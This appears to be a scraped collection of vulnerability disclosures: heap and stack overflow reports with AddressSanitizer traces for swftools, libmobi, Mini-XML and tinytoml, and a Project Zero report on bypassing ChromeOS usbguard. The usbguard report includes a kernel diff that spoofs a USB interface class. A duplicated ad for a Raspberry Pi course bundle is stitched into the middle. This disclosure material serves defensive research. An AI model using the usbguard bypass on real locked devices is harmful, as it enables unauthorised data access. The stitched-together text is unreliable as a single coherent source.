An issue was discovered in swftools through 20201222. A heap-buffer-overflow exists in the function handleEditText() located in swfdump.c. It allows an attacker to cause code Execution.

**system info**

Ubuntu x86\_64, clang 6.0, swfdump (latest master a9d5082)

**Command line**

./src/swfdump -D @@

**AddressSanitizer output**

\==44192==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000e8d3 at pc 0x000000410aca bp 0x7fffffffdee0 sp 0x7fffffffded0  
READ of size 1 at 0x60600000e8d3 thread T0  
#0 0x410ac9 in handleEditText /test/swftools-asan/src/swfdump.c:549  
#1 0x408624 in main /test/swftools-asan/src/swfdump.c:1511  
#2 0x7ffff68a683f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2083f)  
#3 0x40c168 in \_start (/test/swftools-asan/src/swfdump+0x40c168)

0x60600000e8d3 is located 0 bytes to the right of 51-byte region \[0x60600000e8a0,0x60600000e8d3)  
allocated by thread T0 here:  
#0 0x7ffff6f02602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)  
#1 0x532fa7 in rfx\_alloc /test/swftools-asan/lib/mem.c:30  
#2 0x541396 (/test/swftools-asan/src/swfdump+0x541396)

SUMMARY: AddressSanitizer: heap-buffer-overflow /test/swftools-asan/src/swfdump.c:549 handleEditText  
Shadow bytes around the buggy address:  
0x0c0c7fff9cc0: 00 00 00 00 00 00 02 fa fa fa fa fa 00 00 00 00  
0x0c0c7fff9cd0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa  
0x0c0c7fff9ce0: fa fa fa fa 00 00 00 00 00 00 00 05 fa fa fa fa  
0x0c0c7fff9cf0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00  
0x0c0c7fff9d00: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa  
\=>0x0c0c7fff9d10: fa fa fa fa 00 00 00 00 00 00\[03\]fa fa fa fa fa  
0x0c0c7fff9d20: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00  
0x0c0c7fff9d30: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa  
0x0c0c7fff9d40: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa  
0x0c0c7fff9d50: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00  
0x0c0c7fff9d60: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 fa  
Shadow byte legend (one shadow byte represents 8 application bytes):  
Addressable: 00  
Partially addressable: 01 02 03 04 05 06 07  
Heap left redzone: fa  
Heap right redzone: fb  
Freed heap region: fd  
Stack left redzone: f1  
Stack mid redzone: f2  
Stack right redzone: f3  
Stack partial redzone: f4  
Stack after return: f5  
Stack use after scope: f8  
Global redzone: f9  
Global init order: f6  
Poisoned by user: f7  
Container overflow: fc  
Array cookie: ac  
Intra object redzone: bb  
ASan internal: fe  
\==44192==ABORTING

POC  
handleEditText\_poc

CVE-2021-42195: heap-buffer-overflow exists in the function handleEditText in swfdump.c · Issue #174 · matthiaskramm/swftools

This is an exciting time for the Internet of Things. According to Deloitte research, the average U.S. household now has 25 connected devices — and new products are being launched every day. This rush of demand means that many tech companies are looking for developers with IoT knowledge. And even if you don’t want to specialize in this field, the programming skills are transferable.
Featuring

This is an exciting time for the Internet of Things. According to Deloitte research, the average U.S. household now has 25 connected devices — and new products are being launched every day. This rush of demand means that many tech companies are looking for developers with IoT knowledge. And even if you don't want to specialize in this field, the programming skills are transferable.

Featuring nine full-length video courses, The 2022 Complete Raspberry Pi & Arduino Developer Bundle provides a really good introduction to this world. The included training is worth a total of $1,800, but readers of The Hacker News can currently pick up the bundle for only $39.99.

**Special Offer** — _For a limited time, you can get lifetime access to nine courses on Arduino and Raspberry Pi development_ _for just $39.99__. That's a massive 97% off the total price._

Both the Raspberry Pi and the Arduino were specifically designed to help people learn how to code. But both devices have also been used in exciting DIY projects, from cryptocurrency mining to controlling mini-satellites.

In this bundle, you discover how to program both devices for almost any purpose. You also learn how to write Python and C++, and work with ROS2 — the operating system of choice for robotics developers. All of the courses are beginner-friendly, meaning you don't need any previous experience. In addition, they have great reviews from past students.

Your instructor is Edouard Renard, a trained software engineer who founded his own robotics startup. He has helped over 23,000 students to date, picking up an average rating of 4.2 out of 5 stars.

Order today for just $39.99 to get lifetime access to all nine courses on desktop and mobile devices, saving a massive 97% on the total price!

_Prices subject to change_

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Learn Raspberry Pi and Arduino with 9 Online Developer Training Courses

Buffer Over-read in GitHub repository bfabiszewski/libmobi prior to 0.11.

**Description**

heap-buffer-overflow /home/ubuntu/libmobi-public/src/parse\_rawml.c:110 in mobi\_search\_links\_kf7

**Environment**

    Distributor ID: Ubuntu
    Description:    Ubuntu 20.04 LTS
    Release:    20.04
    Codename:   focal
    mobitool build: Apr 29 2022 20:52:30 (gcc 9.3.0)
    libmobi: 0.10
    

**Build**

    export CC=gcc CXX=g++ CFLAGS="-fsanitize=address -static-libasan" CXXFLAGS="-fsanitize=address -static-libasan" LDFLAGS="-fsanitize=address -static-libasan"
    autogen.sh &&  ./configure && make
    

**POC**

    ./mobitool -e -o ./tmp/ ./poc5
    

poc5

**ASAN**

    ==1028892==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62500000748f at pc 0x5631f27052e4 bp 0x7ffe6493c610 sp 0x7ffe6493c600
    READ of size 1 at 0x62500000748f thread T0
        #0 0x5631f27052e3 in mobi_search_links_kf7 /home/ubuntu/libmobi-public/src/parse_rawml.c:110
        #1 0x5631f27052e3 in mobi_search_links_kf7 /home/ubuntu/libmobi-public/src/parse_rawml.c:63
        #2 0x5631f2714a31 in mobi_reconstruct_links_kf7 /home/ubuntu/libmobi-public/src/parse_rawml.c:1679
        #3 0x5631f27180d0 in mobi_reconstruct_links /home/ubuntu/libmobi-public/src/parse_rawml.c:1849
        #4 0x5631f27180d0 in mobi_parse_rawml_opt /home/ubuntu/libmobi-public/src/parse_rawml.c:2153
        #5 0x5631f27180d0 in mobi_parse_rawml /home/ubuntu/libmobi-public/src/parse_rawml.c:2009
        #6 0x5631f25bbe00 in loadfilename /home/ubuntu/libmobi-public/tools/mobitool.c:852
        #7 0x5631f25bbe00 in main /home/ubuntu/libmobi-public/tools/mobitool.c:1051
        #8 0x7f5bf47900b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #9 0x5631f25c76fd in _start (/home/ubuntu/libmobi-public/tools/mobitool+0x266fd)
    
    0x62500000748f is located 0 bytes to the right of 9103-byte region [0x625000005100,0x62500000748f)
    allocated by thread T0 here:
        #0 0x5631f26b2748 in malloc (/home/ubuntu/libmobi-public/tools/mobitool+0x111748)
        #1 0x5631f270cfc0 in mobi_reconstruct_parts /home/ubuntu/libmobi-public/src/parse_rawml.c:805
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ubuntu/libmobi-public/src/parse_rawml.c:110 in mobi_search_links_kf7
    Shadow bytes around the buggy address:
      0x0c4a7fff8e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c4a7fff8e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c4a7fff8e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c4a7fff8e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c4a7fff8e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c4a7fff8e90: 00[07]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff8ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff8ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4a7fff8ee0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1028892==ABORTING
    

**Impact**

The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.

**Occurrences**

CVE-2022-1908: Heap-buffer-overflow  in mobi_search_links_kf7 in libmobi

**Description**

heap-buffer-overflow /home/ubuntu/libmobi-public/src/parse\_rawml.c:357 in mobi\_get\_attribute\_value

**Environment**

    Distributor ID: Ubuntu
    Description:    Ubuntu 20.04 LTS
    Release:    20.04
    Codename:   focal
    mobitool build: Apr 29 2022 20:52:30 (gcc 9.3.0)
    libmobi: 0.10
    

**Build**

    export CC=gcc CXX=g++ CFLAGS="-fsanitize=address -static-libasan" CXXFLAGS="-fsanitize=address -static-libasan" LDFLAGS="-fsanitize=address -static-libasan"
    autogen.sh &&  ./configure && make
    

**POC**

    ./mobitool -e -o ./tmp/ ./poc4
    

poc4

**ASAN**

    =================================================================
    ==150005==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00000141f at pc 0x55dae390a641 bp 0x7ffefa5218a0 sp 0x7ffefa521890
    READ of size 1 at 0x61b00000141f thread T0
        #0 0x55dae390a640 in mobi_get_attribute_value /home/ubuntu/libmobi-public/src/parse_rawml.c:357
        #1 0x55dae391760d in mobi_get_filepos_array /home/ubuntu/libmobi-public/src/parse_rawml.c:1003
        #2 0x55dae391760d in mobi_reconstruct_links_kf7 /home/ubuntu/libmobi-public/src/parse_rawml.c:1660
        #3 0x55dae391b0d0 in mobi_reconstruct_links /home/ubuntu/libmobi-public/src/parse_rawml.c:1849
        #4 0x55dae391b0d0 in mobi_parse_rawml_opt /home/ubuntu/libmobi-public/src/parse_rawml.c:2153
        #5 0x55dae391b0d0 in mobi_parse_rawml /home/ubuntu/libmobi-public/src/parse_rawml.c:2009
        #6 0x55dae37bee00 in loadfilename /home/ubuntu/libmobi-public/tools/mobitool.c:852
        #7 0x55dae37bee00 in main /home/ubuntu/libmobi-public/tools/mobitool.c:1051
        #8 0x7feb6690f0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
        #9 0x55dae37ca6fd in _start (/home/ubuntu/libmobi-public/tools/mobitool+0x266fd)
    
    0x61b00000141f is located 0 bytes to the right of 1439-byte region [0x61b000000e80,0x61b00000141f)
    allocated by thread T0 here:
        #0 0x55dae38b5748 in malloc (/home/ubuntu/libmobi-public/tools/mobitool+0x111748)
        #1 0x55dae390ffc0 in mobi_reconstruct_parts /home/ubuntu/libmobi-public/src/parse_rawml.c:805
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ubuntu/libmobi-public/src/parse_rawml.c:357 in mobi_get_attribute_value
    Shadow bytes around the buggy address:
      0x0c367fff8230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff8240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff8250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff8260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c367fff8270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x0c367fff8280: 00 00 00[07]fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff8290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff82a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff82b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff82c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c367fff82d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==150005==ABORTING
    

**Impact**

The bug causes the program reads data past the end of the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash.

**Occurrences**

CVE-2022-1907: heap-buffer-overflow  in mobi_get_attribute_value in libmobi

ChromeOS uses usbguard when the screen is locked but appears to suffer from bypass issues.

    ChromeOS' usage of usbguard is bypassableVULNERABILITY DETAILSChromeOS uses https://usbguard.github.io/ when the screen is locked (but noton the login screen, perhaps because it is expected that code execution is muchless helpful when the disk is still encrypted?).When the screen is locked, a policy is applied that might look like this(example from my Pixelbook):```allow id 0bda:564b serial \"\\x07LOE65001063010A78M015CFAI06BF12000\" name \"WebCamera\" hash \"KsByWtMB5JtGNDimauArXMiZOThFwagdTWeQsMAZ48c=\" with-interface { 0e:01:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 0e:02:00 } with-connect-type \"hardwired\"allow id 1d6b:0002 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"jEP/6WzviqdJ5VSeTUY8PatCNBKeaREvo2OqdplND/o=\" with-interface 09:00:00 with-connect-type \"\"allow id 1d6b:0003 serial \"0000:00:14.0\" name \"xHCI Host Controller\" hash \"3Wo3XWDgen1hD5xM3PSNl3P98kLp1RUTgGQ5HSxtf8k=\" with-interface 09:00:00 with-connect-type \"\"allow id 8087:0a2a serial \"\" name \"\" hash \"AyPZWy2XK0931kB9A/owYfk5xHEqnpDsJfdeLSGIyuk=\" with-interface { e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 e0:01:01 } with-connect-type \"hardwired\"##################################################################################################### Footer.####################################################################################################block with-interface one-of { 05:*:* 06:*:* 07:*:* 08:*:* } # physical, image, printer, storageallow```As you can see, it mostly just allowlists specific devices with full hashes ofthe expected USB configuration descriptors, and internal USB devices are markedsuch that they won't be accepted on external USB ports.(Which, by the way, might not actually be necessary, since the USB subsystem's`authorized_default` flag is set to 2 when the screen is locked, not 0, meaninginternal USB devices are automatically allowed anyway?)But then at the bottom is this footer that blocks USB devices with interfacedescriptors that contain the following `bInterfaceClass` values: - USB_CLASS_PHYSICAL (5) - USB_CLASS_STILL_IMAGE (6) - USB_CLASS_PRINTER (7) - USB_CLASS_MASS_STORAGE (8)Afterwards, anything else is permitted.This configuration footer comes from<https://source.chromium.org/chromiumos/chromiumos/codesearch/+/main:src/third_party/chromiumos-overlay/sys-apps/usbguard/files/99-rules.conf>.The interface-based classification of devices was introduced in<https://chromium-review.googlesource.com/c/chromiumos/overlays/chromiumos-overlay/+/1217622/>.Apart from the problem that there is a large amount of attack surface in driversfor devices that don't belong into those USB interface classes, there is anotherissue with this approach:The kernel often doesn't care what USB class a device claims to be. The way USBdrivers tend to work, even for standardized protocols, is that the driverspecifies with low priority that it would like to bind to standards-compliantdevices using the proper USB interface class, but also specifies with highpriority that it would like to bind to specific USB devices based on Vendor IDand Product ID, without caring about their USB interface class.As an example, USB_CLASS_MASS_STORAGE is blocklisted, so a USB stick insertedwhile the screen is locked doesn't get past the authorization check:[ 6411.611320] usb 1-1: new high-speed USB device number 31 using xhci_hcd[ 6411.738900] usb 1-1: New USB device found, idVendor=0781, idProduct=5580, bcdDevice= 0.10[ 6411.738910] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=3[ 6411.738916] usb 1-1: Product: [...][ 6411.738921] usb 1-1: Manufacturer: SanDisk[ 6411.738926] usb 1-1: SerialNumber: [...][ 6411.740583] usb 1-1: Device is not authorized for usage[ 6414.875133] cros-ec-sensorhub [...][ 6418.603609] usb 1-1: USB disconnect, device number 31But if we use a Linux machine with appropriate hardware (I'm using a NET2380 devboard, but you could probably also do it with an unlocked Pixel phone or aRaspberry Pi Zero W or something like that) to emulate a USB Mass Storagedevice, using <https://docs.kernel.org/usb/mass-storage.html>, and patch oneline in the attacker kernel so that it claims to be a billboard, not a storagedevice:diff --git a/drivers/usb/gadget/function/storage_common.c b/drivers/usb/gadget/function/storage_common.cindex b859a158a414..d7452c8458a9 100644--- a/drivers/usb/gadget/function/storage_common.c+++ b/drivers/usb/gadget/function/storage_common.c@@ -34,7 +34,7 @@ struct usb_interface_descriptor fsg_intf_desc = {   .bDescriptorType =  USB_DT_INTERFACE,    .bNumEndpoints =  2,    /* Adjusted during fsg_bind() */-  .bInterfaceClass =  USB_CLASS_MASS_STORAGE,+  .bInterfaceClass =  USB_CLASS_BILLBOARD,   .bInterfaceSubClass =  USB_SC_SCSI,  /* Adjusted during fsg_bind() */   .bInterfaceProtocol =  USB_PR_BULK,  /* Adjusted during fsg_bind() */   .iInterface =    FSG_STRING_INTERFACE,Then we can connect just fine even while the screen is locked - first we get a\"Device is not authorized\" message on the initial connection, then usbguardunblocks us and the kernel probes the device as a mass storage device and scansthe partition table:[ 6432.752906] usb 1-1: new high-speed USB device number 32 using xhci_hcd[ 6432.885635] usb 1-1: New USB device found, idVendor=0525, idProduct=a4a5, bcdDevice= 5.17[ 6432.885647] usb 1-1: New USB device strings: Mfr=3, Product=4, SerialNumber=0[ 6432.885653] usb 1-1: Product: Mass Storage Gadget[ 6432.885658] usb 1-1: Manufacturer: Linux 5.17.0-rc4+ with net2280[ 6432.886121] usb 1-1: Device is not authorized for usage[ 6432.891672] usb-storage 1-1:1.0: USB Mass Storage device detected[ 6432.891985] usb-storage 1-1:1.0: Quirks match for vid 0525 pid a4a5: 10000[ 6432.892090] scsi host0: usb-storage 1-1:1.0[ 6432.892567] usb 1-1: authorized to connect[ 6433.920354] scsi 0:0:0:0: Direct-Access     Linux    File-Stor Gadget 0517 PQ: 0 ANSI: 2[ 6433.922585] sd 0:0:0:0: Power-on or device reset occurred[ 6433.923533] sd 0:0:0:0: [sda] 204800 512-byte logical blocks: (105 MB/100 MiB)[ 6434.030869] sd 0:0:0:0: [sda] Write Protect is off[ 6434.030876] sd 0:0:0:0: [sda] Mode Sense: 0f 00 00 00[ 6434.136540] sd 0:0:0:0: [sda] Write cache: enabled, read cache: enabled, doesn't support DPO or FUA[ 6434.363462]  sda: sda1 sda2[ 6434.585367] cros-ec-sensorhub [...][ 6434.588541] sd 0:0:0:0: [sda] Attached SCSI diskI haven't looked at how this issue applies to other USB subsystems in detail,but from a quick glance: - USB_CLASS_PHYSICAL doesn't really show up in the Linux kernel outside of some   number-to-string translation table, so I don't think it matters to the kernel. - Same thing with USB_CLASS_STILL_IMAGE. - The usblp subsystem does have an explicit check for USB_CLASS_PRINTER - but   that check is intentionally bypassed for known devices that are marked in   the kernel as USBLP_QUIRK_BAD_CLASS, and that flag is set for the   \"Seiko Epson Receipt Printer M129C\" (vendor 0x04b8, device 0x0202), so you   can probably also bypass the blocking of the printer interface class that way.I think the best way forward would be to look into whether it is feasible torely exclusively on a trust-on-first-use approach. If that is infeasible, youmay have to talk to upstream about how userspace can reliably determine whichdriver(s) a given USB device might be bound to, since I'm not aware of anyinterface that would let you do that.VERSIONGoogle Chrome  98.0.4758.107 (Official Build) (64-bit) Revision  a2ef32d533baed737df9fc2ed8d505405ecf0c66-refs/branch-heads/4758@{#1167}Platform  14388.61.0 (Official Build) stable-channel eveFirmware Version  Google_Eve.9584.230.0Customization ID  GOOGLE-EVEARC  8165997CREDIT INFORMATIONReporter credit: Jann Horn of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2022-05-25.Found by: jannh@google.com

ChromeOS usbguard Bypass

A stack buffer overflow exists in Mini-XML v3.2. When inputting an unformed XML string to the mxmlLoadString API, it will cause a stack-buffer-overflow in mxml_string_getc:2611.

Hi,

We have used Mini-xml in our project, so I test v3.2 and master branch and found something:

Fisrt, there are some memory leaks in v3.2 and master:

    =================================================================
    ==111401==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 6 byte(s) in 1 object(s) allocated from:
        #0 in strdup (/opt/mnt/software/mxml32/a.out+0x46f260)
        #1 in mxmlSaveAllocString /opt/mnt/software/mxml32/mxml-file.c:227:13
        #2 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:23:8
        #3 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a     .out+0x42f357)
        #4 in fuzzer::Fuzzer::MutateAndTestOne() (/opt/mnt/software/mxml32/a.out+0x439bc4)
        #5 in fuzzer::Fuzzer::Loop(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::a     llocator<char> >, fuzzer::fuzzer_allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<     char> > > > const&) (/opt/mnt/software/mxml32/a.out+0x43b22f)
        #6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/soft     ware/mxml32/a.out+0x42a5ec)
        #7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
        #8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: 6 byte(s) leaked in 1 allocation(s).
    INFO: to ignore leaks on libFuzzer side use -detect_leaks=0.
    

and :  
this is your testmxml.c:

    ...
    Creating libmxml.so.1.6...
    Creating libmxml.a...
    a - mxml-attr.o
    a - mxml-entity.o
    a - mxml-file.o
    a - mxml-get.o
    a - mxml-index.o
    a - mxml-node.o
    a - mxml-search.o
    a - mxml-set.o
    a - mxml-private.o
    a - mxml-string.o
    Compiling testmxml.c
    Linking testmxml...
    Testing library...
    
    =================================================================
    ==113129==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 88 byte(s) in 1 object(s) allocated from:
        #0 in calloc (/opt/mnt/software/mxml32/testmxml+0x4da178)
        #1 in mxml_new /opt/mnt/software/mxml32/mxml-node.c:841:15
        #2 in mxmlNewElement /opt/mnt/software/mxml32/mxml-node.c:382:15
        #3 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1783:14
        #4 in mxmlSAXLoadFile /opt/mnt/software/mxml32/mxml-file.c:467:11
        #5 in main /opt/mnt/software/mxml32/testmxml.c:676:5
        #6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    
    Indirect leak of 37 byte(s) in 1 object(s) allocated from:
        #0 in __interceptor_strdup (/opt/mnt/software/mxml32/testmxml+0x436770)
        #1 in mxmlNewElement /opt/mnt/software/mxml32/mxml-node.c:383:32
        #2 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1783:14
        #3 in mxmlSAXLoadFile /opt/mnt/software/mxml32/mxml-file.c:467:11
        #4 in main /opt/mnt/software/mxml32/testmxml.c:676:5
        #5 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
    
    SUMMARY: AddressSanitizer: 125 byte(s) leaked in 2 allocation(s).
    Makefile:271: recipe for target 'testmxml' failed
    make: *** [testmxml] Error 1
    

also ,we I input an unformed string to mxmlLoadString, there will be a stack-buffer-overflow and heap-buffer-overflow. I think if you add a longth check in mxml\_string\_getc when every pointer change("like (\*s)++"), will be better? Of course Maybe I have use it in a wrong . you can check it here:  
this is my testcase:

    #include <string>
    #include <vector>
    #include <assert.h>
    #include "mxml.h"
    
    extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    
    std::string c(reinterpret_cast<const char *>(data), size);
    
    char *ptr;
    
    mxml_node_t *tree;
    
    tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK);
    
    if(tree){
            ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK);
            if(!ptr) assert(false);
            mxmlDelete(tree);
    }
    
    return 0;
    }
    
    

you can compile your lib with  
CFLAGS =+ "-g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" and  
LDFLAGS =+"-fsanitize=fuzzer-no-link -fsanitize=address"  
and  
clang++ -g -O1 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link mxml\_fuzzer.cpp -I ./ -fsanitize=fuzzer ./libmxml.a

run and these are the backtrace:

    =================================================================
    ==2858==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffed9190220 at pc 0x00000055a6f2 bp 0x7ffed918edc0 sp 0x7ffed918edb8
    READ of size 1 at 0x7ffed9190220 thread T0
        #0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2611:16
        #1 in mxml_parse_element /opt/mnt/software/mxml32/mxml-file.c:2141:16
        #2 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1977:14
        #3 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
        #4 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
        #5 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
        #6 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
        #7 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
        #8 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
        #9 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #10 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)
    

    =================================================================
    ==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98
    READ of size 1 at 0x612000000a73 thread T0
        #0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13
        #1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20
        #2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
        #3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
        #4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
        #5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
        #6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
        #7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
        #8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
        #9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)

CVE-2021-42860: stack-buffer-overflow and heap-buffer-overflow · Issue #286 · michaelrsweet/mxml

There is a stack-overflow vulnerability in tinytoml v0.4 that can cause a crash or DoS.

Hi,

I have found a bug when I fuzzing . When I enter an input file to a program use toml.h with parseFile, it cause a stack-overflow at parseFile function. I think there maybe too much loop or other bug cause this . my stack size is 8192kbs.

I know that we can avoid it by ulimit -s , but I think parse a toml file about 32k that cause 8M stack overflow maybe not a good way. If I make a file follow some pattern , the file may be minimized and smaller than 10k.

Here is the backtrace：

    #0 __asan_memset ()
        at /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:26
    #1  std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >::__zero() () at /usr/local/bin/../include/c++/v1/string:1563
    #2  std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >::basic_string() () at /usr/local/bin/../include/c++/v1/string:1812
    #3  toml::internal::Token::Token(toml::internal::TokenType) () at ./include/toml/toml.h:272
    #4  toml::internal::Lexer::nextToken(bool) () at ./include/toml/toml.h:1022
    #5  toml::internal::Lexer::nextValueToken() () at ./include/toml/toml.h:967
    #6  toml::internal::Parser::nextValue() () at ./include/toml/toml.h:347
    #7  toml::internal::Parser::consumeForValue(toml::internal::TokenType) ()
        at ./include/toml/toml.h:1740
    

(and maybe 20000 times repeat below two lines)

    toml::internal::Parser::parseArray(toml::Value*) () at ./include/toml/toml.h:1978
    toml::internal::Parser::parseValue(toml::Value*) () at ./include/toml/toml.h:1919
    

and this below:

    toml::internal::Parser::parseKeyValue(toml::Value*) () at ./include/toml/toml.h:1883
    toml::internal::Parser::parse() () at ./include/toml/toml.h:1790
    toml::parse(std::__1::basic_istream<char, std::__1::char_traits<char> >&) ()
        at ./include/toml/toml.h:385
    toml::parseFile(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) () at ./include/toml/toml.h:401
    LLVMFuzzerTestOneInput () at /src/parse_file.cc:16
    fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) ()
    RunOneTest () at /src/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:323
